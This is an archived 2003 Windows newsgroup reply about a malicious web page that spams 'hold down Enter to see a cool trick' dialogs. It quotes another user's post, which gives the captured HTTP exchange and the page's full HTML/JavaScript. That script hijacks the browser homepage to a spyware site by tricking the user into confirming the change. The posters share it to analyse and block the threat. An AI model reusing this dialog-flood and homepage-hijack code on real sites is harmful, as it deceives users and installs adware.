Re: Dialogue screen says "Hold down enter key for 10 seconds to see a cool trick"
From: Mike Burgess (winhelp2002_at_spamthis.com)
Date: 12/08/03
- Next message: CETroutman: "Re: Dialogue screen says "Hold down enter key for 10 seconds to see a cool trick""
- Previous message: Cap: "Re: How Effective Are Firewalls and Anti Virus Applications"
- In reply to: Neil McCurdy: "Re: Dialogue screen says "Hold down enter key for 10 seconds to see a cool trick""
- Next in thread: CETroutman: "Re: Dialogue screen says "Hold down enter key for 10 seconds to see a cool trick""
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Sun, 7 Dec 2003 19:11:39 -0500
Neil,
"default-homepage-network.com" installs "Parasite.ClientMan"
http://www.doxdesk.com/parasite/ClientMan.html
It also installs "object.passthison.com", this parasite infects your
machine via a known "ActiveX\HTA exploit" on unpatched boxes.
> (which I'm sure just adds more spyware!)
Exactly! .......
Note: I have *all* the concerned sites targeted in my HOSTS file.
These are also included in my "domains.reg", via Restricted Zone.
http://mvps.org/winhelp2002/restricted.htm
____________________________________________________________
Mike Burgess [MVP Windows Shell\User] http://www.mvps.org/winhelp2002/
Blocking Spyware, Adware, Parasites, Hijackers, Trojans, with a HOSTS file
http://www.mvps.org/winhelp2002/hosts.htm [updated 12-01-03]
Please post replies to this Newsgroup, email address is invalid
-- "Neil McCurdy" <nemccurd@cs.ucsd.edu> wrote in message news:371f15d6.0312071329.7d809589@posting.google.com... > Hi Al -- > > I just had the same thing, and was curious what it was so I did a > little sleuthing. If you had held down the enter key you would have > made the following site your homepage: > http://default-homepage-network.com/start.cgi?hometest > > What that page does is pop up a bunch of ie windows, open your cd rom > drive, open notepad, and warn you that you're susceptible to spyware. > It then encourages you to install their spyware removal software > (which I'm sure just adds more spyware!). > > I haven't rebooted after applying the latest microsoft security patch. > I'm a little concerned that a web page can open my cd rom drive and > run notepad, obviously. Hopefully that patch fixes the problem. > > The html of the original page follows in case you're interested. > > Neil > > --- > > GET /console/home.html HTTP/1.1 > Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, > application/vnd.ms-excel, application/vnd.ms-powerpoint, > application/msword, */* > Accept-Language: en-us > Accept-Encoding: gzip, deflate > User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET > CLR 1.1.4322) > Host: object.passthison.com > Connection: Keep-Alive > > HTTP/1.1 200 OK > Date: Sun, 07 Dec 2003 16:05:28 GMT > Server: Apache/1.3.26 (Unix) > Last-Modified: Sat, 06 Dec 2003 21:48:03 GMT > ETag: "a0406-ec5-3fd24e93" > Accept-Ranges: bytes > Content-Length: 3781 > Connection: close > Content-Type: text/html > > <HTML XMLNS:IE> > <head> > <title>Windows</title> > <STYLE> > @media all { > IE\:HOMEPAGE {behavior:url(#default#homepage)} > } > </STYLE> > <IE:HOMEPAGE ID="homepage" /> > > <script language=Javascript> > function pop(){ > > var expdate = new Date((new Date()).getTime() + 172800000); > if (-1 == -1) { > document.cookie="home=general; expires=" + expdate.toGMTString() + > "; path=/;"; > > if(ie){ homepage.setHomePage("http://default-homepage-network.com/start.cgi?hometest "); > } > > > } > //self.close(); > } > > > > > > var ie = false; > var ns = false; > if(parseInt(navigator.appVersion) >= 4){ > if(navigator.appName.indexOf("crosoft") != -1) ie = true; > if(navigator.appName.indexOf("etscape") != -1) ns = true; > } > > > </script> > > </head> > > <body bgcolor=red leftborder=0 topborder=0 borderleft=0 bordertop=0> > > > <script language=javascript> > <!-- > var agt=navigator.userAgent.toLowerCase(); > var is_ie = (agt.indexOf("msie") != -1); > var is_aol = (agt.indexOf("aol") != -1); > > > if (!is_aol) { > self.moveTo(0,0); > self.resizeTo(screen.availWidth,screen.availHeight); > } > > //--> > </script> > > <script language=javascript> > > alert("HOLD DOWN THE ENTER KEY FOR 10 SECONDS TO SEE A COOL TRICK!"); > alert("DON'T CLICK OK -- JUST HOLD DOWN THE ENTER KEY FOR 10 > SECONDS"); > alert("HOLD DOWN THE ENTER KEY FOR 10 SECONDS TO SEE A COOL TRICK!"); > alert("ON SOME COMPUTER IT'S THE RETURN KEY, NOT THE ENTER KEY"); > alert("NOW PRESS IT DOWN AND HOLD IT FOR 10 SECONDS"); > alert("DON'T JUST CLICK IT - HOLD IT DOWN FOR 10 SECONDS"); > alert("HOLD DOWN THE ENTER OR RETURN KEY FOR 10 SECONDS TO SEE A COOL > TRICK!"); > alert("THIS WON'T WORK UNLESS YOU HOLD IT DOWN"); > alert("THIS WON'T WORK UNLESS YOU HOLD THE ENTER KEY DOWN FOR 10 > SECONDS"); > alert("HITTING THE X WON'T WORK EITHER!"); > if (confirm("DON'T HIT THE CANCEL OR NO BUTTONS - JUST HOLD DOWN THE > ENTER KEY TO SEE THE TRICK")) > { > alert("HOLD DOWN THE ENTER KEY FOR 10 SECONDS TO SEE A COOL TRICK!"); > } > else > { > alert("HOLD DOWN THE ENTER KEY FOR 10 SECONDS TO SEE A COOL TRICK!"); > } > > if (confirm("DON'T HIT THE CANCEL OR NO BUTTONS - JUST HOLD DOWN THE > ENTER KEY TO SEE THE TRICK")) > { > alert("HOLD DOWN THE ENTER KEY FOR 10 SECONDS TO SEE A COOL TRICK!"); > } > else > { > alert("HOLD DOWN THE ENTER KEY FOR 10 SECONDS TO SEE A COOL TRICK!"); > } > > if (confirm("DON'T HIT THE CANCEL OR NO BUTTONS - JUST HOLD DOWN THE > ENTER KEY TO SEE THE TRICK")) > { > alert("HOLD DOWN THE ENTER KEY FOR 10 SECONDS TO SEE A COOL TRICK!"); > } > else > { > alert("HOLD DOWN THE ENTER KEY FOR 10 SECONDS TO SEE A COOL TRICK!"); > } > > if (confirm("DON'T HIT THE CANCEL OR NO BUTTONS - JUST HOLD DOWN THE > ENTER KEY TO SEE THE TRICK")) > { > alert("HOLD DOWN THE ENTER KEY FOR 10 SECONDS TO SEE A COOL TRICK!"); > } > else > { > alert("HOLD DOWN THE ENTER KEY FOR 10 SECONDS TO SEE A COOL TRICK!"); > } > > if (confirm("DON'T HIT THE CANCEL OR NO BUTTONS - JUST HOLD DOWN THE > ENTER KEY TO SEE THE TRICK")) > { > alert("HOLD DOWN THE ENTER KEY FOR 10 SECONDS TO SEE A COOL TRICK!"); > } > else > { > alert("LAST CHANCE TO HOLD DOWN THE ENTER KEY FOR 10 SECONDS!!"); > } > > if (confirm("HOLD DOWN THE ENTER KEY FOR 10 SECONDS TO SEE A COOL > TRICK!")) > { > pop(); > } > else > { > pop(); > } > > if (confirm("HOLD DOWN THE ENTER KEY FOR 10 SECONDS TO SEE A COOL > TRICK!")) > { > pop(); > } > else > { > pop(); > } > > if (confirm("HOLD DOWN THE ENTER KEY FOR 10 SECONDS TO SEE A COOL > TRICK!")) > { > pop(); > } > else > { > pop(); > } > > if (confirm("HOLD DOWN THE ENTER KEY FOR 10 SECONDS TO SEE A COOL > TRICK!")) > { > pop(); > } > else > { > pop(); > } > > if (confirm("HOLD DOWN THE ENTER KEY FOR 10 SECONDS TO SEE A COOL > TRICK!")) > { > pop(); > } > else > { > pop(); > } > > > window.open('Starfield3D.htm'); > > > > self.close(); > > > </script> > > </body> > </html> > > "Al" <anonymous@discussions.microsoft.com> wrote in message news:<03b701c3bc91$d1865f30$a501280a@phx.gbl>... > > While I had internet explorer running suddenly i recieved > > a red screen with a dialogue instructing me to "hold down > > enter key for 10 seconds to see a cool trick" I tried to > > cancel but new dialogues appeared telling me the only way > > I could get out was to "hold down enter key for 10 seconds > > to see a cool trick". It only diaappeared when I used > > task manager to squash internet explorer. Does anyone > > know what this is?
- Next message: CETroutman: "Re: Dialogue screen says "Hold down enter key for 10 seconds to see a cool trick""
- Previous message: Cap: "Re: How Effective Are Firewalls and Anti Virus Applications"
- In reply to: Neil McCurdy: "Re: Dialogue screen says "Hold down enter key for 10 seconds to see a cool trick""
- Next in thread: CETroutman: "Re: Dialogue screen says "Hold down enter key for 10 seconds to see a cool trick""
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
